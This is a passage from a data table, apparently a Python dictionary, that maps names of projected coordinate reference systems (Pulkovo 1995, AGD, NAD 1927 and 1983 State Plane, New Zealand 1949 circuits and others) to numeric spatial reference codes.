'Pulkovo_1995_GK_Zone_5': 20005, 'Pulkovo_1995_GK_Zone_6': 20006, 'Pulkovo_1995_GK_Zone_7': 20007, 'Pulkovo_1995_GK_Zone_8': 20008, 'Pulkovo_1995_GK_Zone_9': 20009, 'Pulkovo_1995_GK_Zone_10': 20010, 'Pulkovo_1995_GK_Zone_11': 20011, 'Pulkovo_1995_GK_Zone_12': 20012, 'Pulkovo_1995_GK_Zone_13': 20013, 'Pulkovo_1995_GK_Zone_14': 20014, 'Pulkovo_1995_GK_Zone_15': 20015, 'Pulkovo_1995_GK_Zone_16': 20016, 
'Pulkovo_1995_GK_Zone_17': 20017, 'Pulkovo_1995_GK_Zone_18': 20018, 'Pulkovo_1995_GK_Zone_19': 20019, 'Pulkovo_1995_GK_Zone_20': 20020, 'Pulkovo_1995_GK_Zone_21': 20021, 'Pulkovo_1995_GK_Zone_22': 20022, 'Pulkovo_1995_GK_Zone_23': 20023, 'Pulkovo_1995_GK_Zone_24': 20024, 'Pulkovo_1995_GK_Zone_25': 20025, 'Pulkovo_1995_GK_Zone_26': 20026, 'Pulkovo_1995_GK_Zone_27': 20027, 'Pulkovo_1995_GK_Zone_28': 20028, 'Pulkovo_1995_GK_Zone_29': 20029, 'Pulkovo_1995_GK_Zone_30': 20030, 'Pulkovo_1995_GK_Zone_31': 20031, 'Pulkovo_1995_GK_Zone_32': 20032, 'Pulkovo_1995_GK_Zone_2N': 20062, 'Pulkovo_1995_GK_Zone_3N': 20063, 'Pulkovo_1995_GK_Zone_4N': 20064, 'Pulkovo_1995_GK_Zone_5N': 20065, 'Pulkovo_1995_GK_Zone_6N': 20066, 'Pulkovo_1995_GK_Zone_7N': 20067, 'Pulkovo_1995_GK_Zone_8N': 20068, 'Pulkovo_1995_GK_Zone_9N': 20069, 'Pulkovo_1995_GK_Zone_10N': 20070, 'Pulkovo_1995_GK_Zone_11N': 20071, 'Pulkovo_1995_GK_Zone_12N': 20072, 'Pulkovo_1995_GK_Zone_13N': 20073, 'Pulkovo_1995_GK_Zone_14N': 20074, 'Pulkovo_1995_GK_Zone_15N': 20075, 'Pulkovo_1995_GK_Zone_16N': 20076, 'Pulkovo_1995_GK_Zone_17N': 20077, 'Pulkovo_1995_GK_Zone_18N': 20078, 'Pulkovo_1995_GK_Zone_19N': 20079, 'Pulkovo_1995_GK_Zone_20N': 20080, 'Pulkovo_1995_GK_Zone_21N': 20081, 'Pulkovo_1995_GK_Zone_22N': 20082, 'Pulkovo_1995_GK_Zone_23N': 20083, 'Pulkovo_1995_GK_Zone_24N': 20084, 'Pulkovo_1995_GK_Zone_25N': 20085, 'Pulkovo_1995_GK_Zone_26N': 20086, 'Pulkovo_1995_GK_Zone_27N': 20087, 'Pulkovo_1995_GK_Zone_28N': 20088, 'Pulkovo_1995_GK_Zone_29N': 20089, 'Pulkovo_1995_GK_Zone_30N': 20090, 'Pulkovo_1995_GK_Zone_31N': 20091, 'Pulkovo_1995_GK_Zone_32N': 20092, 'Adindan_UTM_Zone_35N': 20135, 'Adindan_UTM_Zone_36N': 20136, 'Adindan_UTM_Zone_37N': 20137, 'Adindan_UTM_Zone_38N': 20138, 'AGD_1966_AMG_Zone_48': 20248, 'AGD_1966_AMG_Zone_49': 20249, 'AGD_1966_AMG_Zone_50': 20250, 'AGD_1966_AMG_Zone_51': 20251, 'AGD_1966_AMG_Zone_52': 20252, 'AGD_1966_AMG_Zone_53': 20253, 'AGD_1966_AMG_Zone_54': 20254, 'AGD_1966_AMG_Zone_55': 20255, 
'AGD_1966_AMG_Zone_56': 20256, 'AGD_1966_AMG_Zone_57': 20257, 'AGD_1966_AMG_Zone_58': 20258, 'AGD_1984_AMG_Zone_48': 20348, 'AGD_1984_AMG_Zone_49': 20349, 'AGD_1984_AMG_Zone_50': 20350, 'AGD_1984_AMG_Zone_51': 20351, 'AGD_1984_AMG_Zone_52': 20352, 'AGD_1984_AMG_Zone_53': 20353, 'AGD_1984_AMG_Zone_54': 20354, 'AGD_1984_AMG_Zone_55': 20355, 'AGD_1984_AMG_Zone_56': 20356, 'AGD_1984_AMG_Zone_57': 20357, 'AGD_1984_AMG_Zone_58': 20358, 'Ain_el_Abd_UTM_Zone_36N': 20436, 'Ain_el_Abd_UTM_Zone_37N': 20437, 'Ain_el_Abd_UTM_Zone_38N': 20438, 'Ain_el_Abd_UTM_Zone_39N': 20439, 'Ain_el_Abd_UTM_Zone_40N': 20440, 'Bahrain_State_Grid': 20499, 'Afgooye_UTM_Zone_38N': 20538, 'Afgooye_UTM_Zone_39N': 20539, 'Portuguese_National_Grid': 20790, 'Aratu_UTM_Zone_22S': 20822, 'Aratu_UTM_Zone_23S': 20823, 'Aratu_UTM_Zone_24S': 20824, 'Arc_1950_UTM_Zone_34S': 20934, 'Arc_1950_UTM_Zone_35S': 20935, 'Arc_1950_UTM_Zone_36S': 20936, 'Arc_1960_UTM_Zone_35S': 21035, 'Arc_1960_UTM_Zone_36S': 21036, 'Arc_1960_UTM_Zone_37S': 21037, 'Arc_1960_UTM_Zone_35N': 21095, 'Arc_1960_UTM_Zone_36N': 21096, 'Arc_1960_UTM_Zone_37N': 21097, 'Batavia_UTM_Zone_48S': 21148, 'Batavia_UTM_Zone_49S': 21149, 'Batavia_UTM_Zone_50S': 21150, 'Barbados_1938_British_West_Indies_Grid': 21291, 'Barbados_1938_Barbados_Grid': 21292, 'Beijing_1954_GK_Zone_13': 21413, 'Beijing_1954_GK_Zone_14': 21414, 'Beijing_1954_GK_Zone_15': 21415, 'Beijing_1954_GK_Zone_16': 21416, 'Beijing_1954_GK_Zone_17': 21417, 'Beijing_1954_GK_Zone_18': 21418, 'Beijing_1954_GK_Zone_19': 21419, 'Beijing_1954_GK_Zone_20': 21420, 'Beijing_1954_GK_Zone_21': 21421, 'Beijing_1954_GK_Zone_22': 21422, 'Beijing_1954_GK_Zone_23': 21423, 'Beijing_1954_GK_Zone_13N': 21473, 'Beijing_1954_GK_Zone_14N': 21474, 'Beijing_1954_GK_Zone_15N': 21475, 'Beijing_1954_GK_Zone_16N': 21476, 'Beijing_1954_GK_Zone_17N': 21477, 'Beijing_1954_GK_Zone_18N': 21478, 'Beijing_1954_GK_Zone_19N': 21479, 'Beijing_1954_GK_Zone_20N': 21480, 'Beijing_1954_GK_Zone_21N': 21481, 
'Beijing_1954_GK_Zone_22N': 21482, 'Beijing_1954_GK_Zone_23N': 21483, 'Belge_Lambert_1950': 21500, 'Bern_1898_Bern_LV03C': 21780, 'CH1903_LV03': 21781, 'Bogota_UTM_Zone_17N': 21817, 'Bogota_UTM_Zone_18N': 21818, 'Colombia_West_Zone': 21891, 'Colombia_Bogota_Zone': 21892, 'Colombia_East_Central_Zone': 21893, 'Colombia_East_Zone': 21894, 'Colombia_West_Zone': 21896, 'Colombia_Bogota_Zone': 21897, 'Colombia_East_Central_Zone': 21898, 'Colombia_East_Zone': 21899, 'Camacupa_UTM_Zone_32S': 22032, 'Camacupa_UTM_Zone_33S': 22033, 'Camacupa_TM_11_30_SE': 22091, 'Camacupa_TM_12_SE': 22092, 'POSGAR_1998_Argentina_Zone_1': 22171, 'POSGAR_1998_Argentina_Zone_2': 22172, 'POSGAR_1998_Argentina_Zone_3': 22173, 'POSGAR_1998_Argentina_Zone_4': 22174, 'POSGAR_1998_Argentina_Zone_5': 22175, 'POSGAR_1998_Argentina_Zone_6': 22176, 'POSGAR_1998_Argentina_Zone_7': 22177, 'POSGAR_1994_Argentina_Zone_1': 22181, 'POSGAR_1994_Argentina_Zone_2': 22182, 'POSGAR_1994_Argentina_Zone_3': 22183, 'POSGAR_1994_Argentina_Zone_4': 22184, 'POSGAR_1994_Argentina_Zone_5': 22185, 'POSGAR_1994_Argentina_Zone_6': 22186, 'POSGAR_1994_Argentina_Zone_7': 22187, 'Argentina_Zone_1': 22191, 'Argentina_Zone_2': 22192, 'Argentina_Zone_3': 22193, 'Argentina_Zone_4': 22194, 'Argentina_Zone_5': 22195, 'Argentina_Zone_6': 22196, 'Argentina_Zone_7': 22197, 'Cape_UTM_Zone_34S': 22234, 'Cape_UTM_Zone_35S': 22235, 'Cape_UTM_Zone_36S': 22236, 'Carthage_UTM_Zone_32N': 22332, 'Nord_Tunisie': 22391, 'Sud_Tunisie': 22392, 'Corrego_Alegre_UTM_Zone_21S': 22521, 'Corrego_Alegre_UTM_Zone_22S': 22522, 'Corrego_Alegre_UTM_Zone_23S': 22523, 'Corrego_Alegre_UTM_Zone_24S': 22524, 'Corrego_Alegre_UTM_Zone_25S': 22525, 'Deir_ez_Zor_Levant_Zone': 22700, 'Deir_ez_Zor_Syria_Lambert': 22770, 'Deir_ez_Zor_Levant_Stereographic': 22780, 'Douala_UTM_Zone_32N': 22832, 'Egypt_Blue_Belt': 22991, 'Egypt_Red_Belt': 22992, 'Egypt_Purple_Belt': 22993, 'Egypt_Extended_Purple_Belt': 22994, 'ED_1950_UTM_Zone_28N': 23028, 'ED_1950_UTM_Zone_29N': 23029, 
'ED_1950_UTM_Zone_30N': 23030, 'ED_1950_UTM_Zone_31N': 23031, 'ED_1950_UTM_Zone_32N': 23032, 'ED_1950_UTM_Zone_33N': 23033, 'ED_1950_UTM_Zone_34N': 23034, 'ED_1950_UTM_Zone_35N': 23035, 'ED_1950_UTM_Zone_36N': 23036, 'ED_1950_UTM_Zone_37N': 23037, 'ED_1950_UTM_Zone_38N': 23038, 'ED_1950_TM_0_N': 23090, 'ED_1950_TM_5_NE': 23095, 'Fahud_UTM_Zone_39N': 23239, 'Fahud_UTM_Zone_40N': 23240, 'Garoua_UTM_Zone_33N': 23433, 'Hungarian_1972_Egyseges_Orszagos_Vetuleti': 23700, 'DGN_1995_Indonesia_TM-3_Zone_46.2': 23830, 'DGN_1995_Indonesia_TM-3_Zone_47.1': 23831, 'DGN_1995_Indonesia_TM-3_Zone_47.2': 23832, 'DGN_1995_Indonesia_TM-3_Zone_48.1': 23833, 'DGN_1995_Indonesia_TM-3_Zone_48.2': 23834, 'DGN_1995_Indonesia_TM-3_Zone_49.1': 23835, 'DGN_1995_Indonesia_TM-3_Zone_49.2': 23836, 'DGN_1995_Indonesia_TM-3_Zone_50.1': 23837, 'DGN_1995_Indonesia_TM-3_Zone_50.2': 23838, 'DGN_1995_Indonesia_TM-3_Zone_51.1': 23839, 'DGN_1995_Indonesia_TM-3_Zone_51.2': 23840, 'DGN_1995_Indonesia_TM-3_Zone_52.1': 23841, 'DGN_1995_Indonesia_TM-3_Zone_52.2': 23842, 'DGN_1995_Indonesia_TM-3_Zone_53.1': 23843, 'DGN_1995_Indonesia_TM-3_Zone_53.2': 23844, 'DGN_1995_Indonesia_TM-3_Zone_54.1': 23845, 'Indonesian_1974_UTM_Zone_46N': 23846, 'Indonesian_1974_UTM_Zone_47N': 23847, 'Indonesian_1974_UTM_Zone_48N': 23848, 'Indonesian_1974_UTM_Zone_49N': 23849, 'Indonesian_1974_UTM_Zone_50N': 23850, 'Indonesian_1974_UTM_Zone_51N': 23851, 'Indonesian_1974_UTM_Zone_52N': 23852, 'Indonesian_1974_UTM_Zone_53N': 23853, 'DGN_1995_UTM_Zone_46N': 23866, 'DGN_1995_UTM_Zone_47N': 23867, 'DGN_1995_UTM_Zone_48N': 23868, 'DGN_1995_UTM_Zone_49N': 23869, 'DGN_1995_UTM_Zone_50N': 23870, 'DGN_1995_UTM_Zone_51N': 23871, 'DGN_1995_UTM_Zone_52N': 23872, 'DGN_1995_UTM_Zone_47S': 23877, 'DGN_1995_UTM_Zone_48S': 23878, 'DGN_1995_UTM_Zone_49S': 23879, 'DGN_1995_UTM_Zone_50S': 23880, 'DGN_1995_UTM_Zone_51S': 23881, 'DGN_1995_UTM_Zone_52S': 23882, 'DGN_1995_UTM_Zone_53S': 23883, 'DGN_1995_UTM_Zone_54S': 23884, 'Indonesian_1974_UTM_Zone_46S': 
23886, 'Indonesian_1974_UTM_Zone_47S': 23887, 'Indonesian_1974_UTM_Zone_48S': 23888, 'Indonesian_1974_UTM_Zone_49S': 23889, 'Indonesian_1974_UTM_Zone_50S': 23890, 'Indonesian_1974_UTM_Zone_51S': 23891, 'Indonesian_1974_UTM_Zone_52S': 23892, 'Indonesian_1974_UTM_Zone_53S': 23893, 'Indonesian_1974_UTM_Zone_54S': 23894, 'Indian_1954_UTM_Zone_46N': 23946, 'Indian_1954_UTM_Zone_47N': 23947, 'Indian_1954_UTM_Zone_48N': 23948, 'Indian_1975_UTM_Zone_47N': 24047, 'Indian_1975_UTM_Zone_48N': 24048, 'Jamaica_1875_Old_Grid': 24100, 'Jamaica_Grid': 24200, 'Kalianpur_1937_UTM_Zone_45N': 24305, 'Kalianpur_1937_UTM_Zone_46N': 24306, 'Kalianpur_1962_UTM_Zone_41N': 24311, 'Kalianpur_1962_UTM_Zone_42N': 24312, 'Kalianpur_1962_UTM_Zone_43N': 24313, 'Kalianpur_1975_UTM_Zone_42N': 24342, 'Kalianpur_1975_UTM_Zone_43N': 24343, 'Kalianpur_1975_UTM_Zone_44N': 24344, 'Kalianpur_1975_UTM_Zone_45N': 24345, 'Kalianpur_1975_UTM_Zone_46N': 24346, 'Kalianpur_1975_UTM_Zone_47N': 24347, 'Kalianpur_1880_India_Zone_0': 24370, 'Kalianpur_1880_India_Zone_I': 24371, 'Kalianpur_1880_India_Zone_IIa': 24372, 'Kalianpur_1880_India_Zone_III': 24373, 'Kalianpur_1880_India_Zone_IV': 24374, 'Kalianpur_1937_India_Zone_IIb': 24375, 'Kalianpur_1962_India_Zone_I': 24376, 'Kalianpur_1962_India_Zone_IIa': 24377, 'Kalianpur_1975_India_Zone_I': 24378, 'Kalianpur_1975_India_Zone_IIa': 24379, 'Kalianpur_1975_India_Zone_IIb': 24380, 'Kalianpur_1975_India_Zone_III': 24381, 'Kalianpur_1880_India_Zone_IIb': 24382, 'Kalianpur_1975_India_Zone_IV': 24383, 'Kertau_Singapore_Grid': 24500, 'Kertau_UTM_Zone_47N': 24547, 'Kertau_UTM_Zone_48N': 24548, 'Kertau_RSO_Malaya_Chains': 24571, 'KOC_Lambert': 24600, 'La_Canoa_UTM_Zone_18N': 24718, 'La_Canoa_UTM_Zone_19N': 24719, 'La_Canoa_UTM_Zone_20N': 24720, 'La_Canoa_UTM_Zone_21N': 24721, 'PSAD_1956_UTM_Zone_17N': 24817, 'PSAD_1956_UTM_Zone_18N': 24818, 'PSAD_1956_UTM_Zone_19N': 24819, 'PSAD_1956_UTM_Zone_20N': 24820, 'PSAD_1956_UTM_Zone_21N': 24821, 'PSAD_1956_UTM_Zone_17S': 24877, 
'PSAD_1956_UTM_Zone_18S': 24878, 'PSAD_1956_UTM_Zone_19S': 24879, 'PSAD_1956_UTM_Zone_20S': 24880, 'PSAD_1956_UTM_Zone_21S': 24881, 'PSAD_1956_UTM_Zone_22S': 24882, 'Peru_West_Zone': 24891, 'Peru_Central_Zone': 24892, 'Peru_East_Zone': 24893, 'Ghana_Metre_Grid': 25000, 'Lome_UTM_Zone_31N': 25231, 'Philippines_Zone_I': 25391, 'Philippines_Zone_II': 25392, 'Philippines_Zone_III': 25393, 'Philippines_Zone_IV': 25394, 'Philippines_Zone_V': 25395, 'ETRS_1989_UTM_Zone_28N': 25828, 'ETRS_1989_UTM_Zone_29N': 25829, 'ETRS_1989_UTM_Zone_30N': 25830, 'ETRS_1989_UTM_Zone_31N': 25831, 'ETRS_1989_UTM_Zone_32N': 25832, 'ETRS_1989_UTM_Zone_33N': 25833, 'ETRS_1989_UTM_Zone_34N': 25834, 'ETRS_1989_UTM_Zone_35N': 25835, 'ETRS_1989_UTM_Zone_36N': 25836, 'ETRS_1989_UTM_Zone_37N': 25837, 'ETRS_1989_UTM_Zone_38N': 25838, 'ETRS_1989_TM_Baltic_1993': 25884, 'Malongo_1987_UTM_Zone_32S': 25932, 'Nord_Maroc': 26191, 'Sud_Maroc': 26192, 'Sahara': 26193, 'Merchich_Sahara_Nord': 26194, 'Merchich_Sahara_Sud': 26195, 'Massawa_UTM_Zone_37N': 26237, 'Minna_UTM_Zone_31N': 26331, 'Minna_UTM_Zone_32N': 26332, 'Nigeria_West_Belt': 26391, 'Nigeria_Mid_Belt': 26392, 'Nigeria_East_Belt': 26393, 'Mhast_UTM_Zone_32S': 26432, 'Monte_Mario_Rome_Italy_1': 26591, 'Monte_Mario_Rome_Italy_2': 26592, 'Mporaloko_UTM_Zone_32N': 26632, 'Mporaloko_UTM_Zone_32S': 26692, 'NAD_1927_UTM_Zone_1N': 26701, 'NAD_1927_UTM_Zone_2N': 26702, 'NAD_1927_UTM_Zone_3N': 26703, 'NAD_1927_UTM_Zone_4N': 26704, 'NAD_1927_UTM_Zone_5N': 26705, 'NAD_1927_UTM_Zone_6N': 26706, 'NAD_1927_UTM_Zone_7N': 26707, 'NAD_1927_UTM_Zone_8N': 26708, 'NAD_1927_UTM_Zone_9N': 26709, 'NAD_1927_UTM_Zone_10N': 26710, 'NAD_1927_UTM_Zone_11N': 26711, 'NAD_1927_UTM_Zone_12N': 26712, 'NAD_1927_UTM_Zone_13N': 26713, 'NAD_1927_UTM_Zone_14N': 26714, 'NAD_1927_UTM_Zone_15N': 26715, 'NAD_1927_UTM_Zone_16N': 26716, 'NAD_1927_UTM_Zone_17N': 26717, 'NAD_1927_UTM_Zone_18N': 26718, 'NAD_1927_UTM_Zone_19N': 26719, 'NAD_1927_UTM_Zone_20N': 26720, 'NAD_1927_UTM_Zone_21N': 26721, 
'NAD_1927_UTM_Zone_22N': 26722, 'NAD_1927_StatePlane_Alabama_East_FIPS_0101': 26729, 'NAD_1927_StatePlane_Alabama_West_FIPS_0102': 26730, 'NAD_1927_StatePlane_Alaska_1_FIPS_5001': 26731, 'NAD_1927_StatePlane_Alaska_2_FIPS_5002': 26732, 'NAD_1927_StatePlane_Alaska_3_FIPS_5003': 26733, 'NAD_1927_StatePlane_Alaska_4_FIPS_5004': 26734, 'NAD_1927_StatePlane_Alaska_5_FIPS_5005': 26735, 'NAD_1927_StatePlane_Alaska_6_FIPS_5006': 26736, 'NAD_1927_StatePlane_Alaska_7_FIPS_5007': 26737, 'NAD_1927_StatePlane_Alaska_8_FIPS_5008': 26738, 'NAD_1927_StatePlane_Alaska_9_FIPS_5009': 26739, 'NAD_1927_StatePlane_Alaska_10_FIPS_5010': 26740, 'NAD_1927_StatePlane_California_I_FIPS_0401': 26741, 'NAD_1927_StatePlane_California_II_FIPS_0402': 26742, 'NAD_1927_StatePlane_California_III_FIPS_0403': 26743, 'NAD_1927_StatePlane_California_IV_FIPS_0404': 26744, 'NAD_1927_StatePlane_California_V_FIPS_0405': 26745, 'NAD_1927_StatePlane_California_VI_FIPS_0406': 26746, 'NAD_1927_StatePlane_California_VII_FIPS_0407': 26747, 'NAD_1927_StatePlane_Arizona_East_FIPS_0201': 26748, 'NAD_1927_StatePlane_Arizona_Central_FIPS_0202': 26749, 'NAD_1927_StatePlane_Arizona_West_FIPS_0203': 26750, 'NAD_1927_StatePlane_Arkansas_North_FIPS_0301': 26751, 'NAD_1927_StatePlane_Arkansas_South_FIPS_0302': 26752, 'NAD_1927_StatePlane_Colorado_North_FIPS_0501': 26753, 'NAD_1927_StatePlane_Colorado_Central_FIPS_0502': 26754, 'NAD_1927_StatePlane_Colorado_South_FIPS_0503': 26755, 'NAD_1927_StatePlane_Connecticut_FIPS_0600': 26756, 'NAD_1927_StatePlane_Delaware_FIPS_0700': 26757, 'NAD_1927_StatePlane_Florida_East_FIPS_0901': 26758, 'NAD_1927_StatePlane_Florida_West_FIPS_0902': 26759, 'NAD_1927_StatePlane_Florida_North_FIPS_0903': 26760, 'NAD_1927_StatePlane_Hawaii_1_FIPS_5101': 26761, 'NAD_1927_StatePlane_Hawaii_2_FIPS_5102': 26762, 'NAD_1927_StatePlane_Hawaii_3_FIPS_5103': 26763, 'NAD_1927_StatePlane_Hawaii_4_FIPS_5104': 26764, 'NAD_1927_StatePlane_Hawaii_5_FIPS_5105': 26765, 'NAD_1927_StatePlane_Georgia_East_FIPS_1001': 
26766, 'NAD_1927_StatePlane_Georgia_West_FIPS_1002': 26767, 'NAD_1927_StatePlane_Idaho_East_FIPS_1101': 26768, 'NAD_1927_StatePlane_Idaho_Central_FIPS_1102': 26769, 'NAD_1927_StatePlane_Idaho_West_FIPS_1103': 26770, 'NAD_1927_StatePlane_Illinois_East_FIPS_1201': 26771, 'NAD_1927_StatePlane_Illinois_West_FIPS_1202': 26772, 'NAD_1927_StatePlane_Indiana_East_FIPS_1301': 26773, 'NAD_1927_StatePlane_Indiana_West_FIPS_1302': 26774, 'NAD_1927_StatePlane_Iowa_North_FIPS_1401': 26775, 'NAD_1927_StatePlane_Iowa_South_FIPS_1402': 26776, 'NAD_1927_StatePlane_Kansas_North_FIPS_1501': 26777, 'NAD_1927_StatePlane_Kansas_South_FIPS_1502': 26778, 'NAD_1927_StatePlane_Kentucky_North_FIPS_1601': 26779, 'NAD_1927_StatePlane_Kentucky_South_FIPS_1602': 26780, 'NAD_1927_StatePlane_Louisiana_North_FIPS_1701': 26781, 'NAD_1927_StatePlane_Louisiana_South_FIPS_1702': 26782, 'NAD_1927_StatePlane_Maine_East_FIPS_1801': 26783, 'NAD_1927_StatePlane_Maine_West_FIPS_1802': 26784, 'NAD_1927_StatePlane_Maryland_FIPS_1900': 26785, 'NAD_1927_StatePlane_Massachusetts_Mainland_FIPS_2001': 26786, 'NAD_1927_StatePlane_Massachusetts_Island_FIPS_2002': 26787, 'NAD_1927_StatePlane_Michigan_North_FIPS_2111': 26788, 'NAD_1927_StatePlane_Michigan_Central_FIPS_2112': 26789, 'NAD_1927_StatePlane_Michigan_South_FIPS_2113': 26790, 'NAD_1927_StatePlane_Minnesota_North_FIPS_2201': 26791, 'NAD_1927_StatePlane_Minnesota_Central_FIPS_2202': 26792, 'NAD_1927_StatePlane_Minnesota_South_FIPS_2203': 26793, 'NAD_1927_StatePlane_Mississippi_East_FIPS_2301': 26794, 'NAD_1927_StatePlane_Mississippi_West_FIPS_2302': 26795, 'NAD_1927_StatePlane_Missouri_East_FIPS_2401': 26796, 'NAD_1927_StatePlane_Missouri_Central_FIPS_2402': 26797, 'NAD_1927_StatePlane_Missouri_West_FIPS_2403': 26798, 'NAD_1927_StatePlane_California_VII_FIPS_0407': 26799, 'NAD_Michigan_StatePlane_Michigan_East_Old_FIPS_2101': 26801, 'NAD_Michigan_StatePlane_Michigan_Central_Old_FIPS_2102': 26802, 'NAD_Michigan_StatePlane_Michigan_West_Old_FIPS_2103': 26803, 
'NAD_Michigan_StatePlane_Michigan_North_FIPS_2111': 26811, 'NAD_Michigan_StatePlane_Michigan_Central_FIPS_2112': 26812, 'NAD_Michigan_StatePlane_Michigan_South_FIPS_2113': 26813, 'NAD_1983_UTM_Zone_1N': 26901, 'NAD_1983_UTM_Zone_2N': 26902, 'NAD_1983_UTM_Zone_3N': 26903, 'NAD_1983_UTM_Zone_4N': 26904, 'NAD_1983_UTM_Zone_5N': 26905, 'NAD_1983_UTM_Zone_6N': 26906, 'NAD_1983_UTM_Zone_7N': 26907, 'NAD_1983_UTM_Zone_8N': 26908, 'NAD_1983_UTM_Zone_9N': 26909, 'NAD_1983_UTM_Zone_10N': 26910, 'NAD_1983_UTM_Zone_11N': 26911, 'NAD_1983_UTM_Zone_12N': 26912, 'NAD_1983_UTM_Zone_13N': 26913, 'NAD_1983_UTM_Zone_14N': 26914, 'NAD_1983_UTM_Zone_15N': 26915, 'NAD_1983_UTM_Zone_16N': 26916, 'NAD_1983_UTM_Zone_17N': 26917, 'NAD_1983_UTM_Zone_18N': 26918, 'NAD_1983_UTM_Zone_19N': 26919, 'NAD_1983_UTM_Zone_20N': 26920, 'NAD_1983_UTM_Zone_21N': 26921, 'NAD_1983_UTM_Zone_22N': 26922, 'NAD_1983_UTM_Zone_23N': 26923, 'NAD_1983_StatePlane_Alabama_East_FIPS_0101': 26929, 'NAD_1983_StatePlane_Alabama_West_FIPS_0102': 26930, 'NAD_1983_StatePlane_Alaska_1_FIPS_5001': 26931, 'NAD_1983_StatePlane_Alaska_2_FIPS_5002': 26932, 'NAD_1983_StatePlane_Alaska_3_FIPS_5003': 26933, 'NAD_1983_StatePlane_Alaska_4_FIPS_5004': 26934, 'NAD_1983_StatePlane_Alaska_5_FIPS_5005': 26935, 'NAD_1983_StatePlane_Alaska_6_FIPS_5006': 26936, 'NAD_1983_StatePlane_Alaska_7_FIPS_5007': 26937, 'NAD_1983_StatePlane_Alaska_8_FIPS_5008': 26938, 'NAD_1983_StatePlane_Alaska_9_FIPS_5009': 26939, 'NAD_1983_StatePlane_Alaska_10_FIPS_5010': 26940, 'NAD_1983_StatePlane_California_I_FIPS_0401': 26941, 'NAD_1983_StatePlane_California_II_FIPS_0402': 26942, 'NAD_1983_StatePlane_California_III_FIPS_0403': 26943, 'NAD_1983_StatePlane_California_IV_FIPS_0404': 26944, 'NAD_1983_StatePlane_California_V_FIPS_0405': 26945, 'NAD_1983_StatePlane_California_VI_FIPS_0406': 26946, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201': 26948, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202': 26949, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203': 26950, 
'NAD_1983_StatePlane_Arkansas_North_FIPS_0301': 26951, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302': 26952, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501': 26953, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502': 26954, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503': 26955, 'NAD_1983_StatePlane_Connecticut_FIPS_0600': 26956, 'NAD_1983_StatePlane_Delaware_FIPS_0700': 26957, 'NAD_1983_StatePlane_Florida_East_FIPS_0901': 26958, 'NAD_1983_StatePlane_Florida_West_FIPS_0902': 26959, 'NAD_1983_StatePlane_Florida_North_FIPS_0903': 26960, 'NAD_1983_StatePlane_Hawaii_1_FIPS_5101': 26961, 'NAD_1983_StatePlane_Hawaii_2_FIPS_5102': 26962, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103': 26963, 'NAD_1983_StatePlane_Hawaii_4_FIPS_5104': 26964, 'NAD_1983_StatePlane_Hawaii_5_FIPS_5105': 26965, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001': 26966, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002': 26967, 'NAD_1983_StatePlane_Idaho_East_FIPS_1101': 26968, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102': 26969, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103': 26970, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201': 26971, 'NAD_1983_StatePlane_Illinois_West_FIPS_1202': 26972, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301': 26973, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302': 26974, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401': 26975, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402': 26976, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501': 26977, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502': 26978, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601': 26979, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602': 26980, 'NAD_1983_StatePlane_Louisiana_North_FIPS_1701': 26981, 'NAD_1983_StatePlane_Louisiana_South_FIPS_1702': 26982, 'NAD_1983_StatePlane_Maine_East_FIPS_1801': 26983, 'NAD_1983_StatePlane_Maine_West_FIPS_1802': 26984, 'NAD_1983_StatePlane_Maryland_FIPS_1900': 26985, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001': 26986, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002': 26987, 
'NAD_1983_StatePlane_Michigan_North_FIPS_2111': 26988, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112': 26989, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113': 26990, 'NAD_1983_StatePlane_Minnesota_North_FIPS_2201': 26991, 'NAD_1983_StatePlane_Minnesota_Central_FIPS_2202': 26992, 'NAD_1983_StatePlane_Minnesota_South_FIPS_2203': 26993, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301': 26994, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302': 26995, 'NAD_1983_StatePlane_Missouri_East_FIPS_2401': 26996, 'NAD_1983_StatePlane_Missouri_Central_FIPS_2402': 26997, 'NAD_1983_StatePlane_Missouri_West_FIPS_2403': 26998, 'Nahrwan_1967_UTM_Zone_37N': 27037, 'Nahrwan_1967_UTM_Zone_38N': 27038, 'Nahrwan_1967_UTM_Zone_39N': 27039, 'Nahrwan_1967_UTM_Zone_40N': 27040, 'Naparima_1972_UTM_Zone_20N': 27120, 'GD_1949_New_Zealand_Map_Grid': 27200, 'NZGD_1949_Mount_Eden_Circuit': 27205, 'NZGD_1949_Bay_of_Plenty_Circuit': 27206, 'NZGD_1949_Poverty_Bay_Circuit': 27207, 'NZGD_1949_Hawkes_Bay_Circuit': 27208, 'NZGD_1949_Taranaki_Circuit': 27209, 'NZGD_1949_Tuhirangi_Circuit': 27210, 'NZGD_1949_Wanganui_Circuit': 27211, 'NZGD_1949_Wairarapa_Circuit': 27212, 'NZGD_1949_Wellington_Circuit': 27213, 'NZGD_1949_Collingwood_Circuit': 27214, 'NZGD_1949_Nelson_Circuit': 27215, 'NZGD_1949_Karamea_Circuit': 27216, 'NZGD_1949_Buller_Circuit': 27217, 'NZGD_1949_Grey_Circuit': 27218, 'NZGD_1949_Amuri_Circuit': 27219, 'NZGD_1949_Marlborough_Circuit': 27220, 'NZGD_1949_Hokitika_Circuit': 27221, 'NZGD_1949_Okarito_Circuit': 27222, 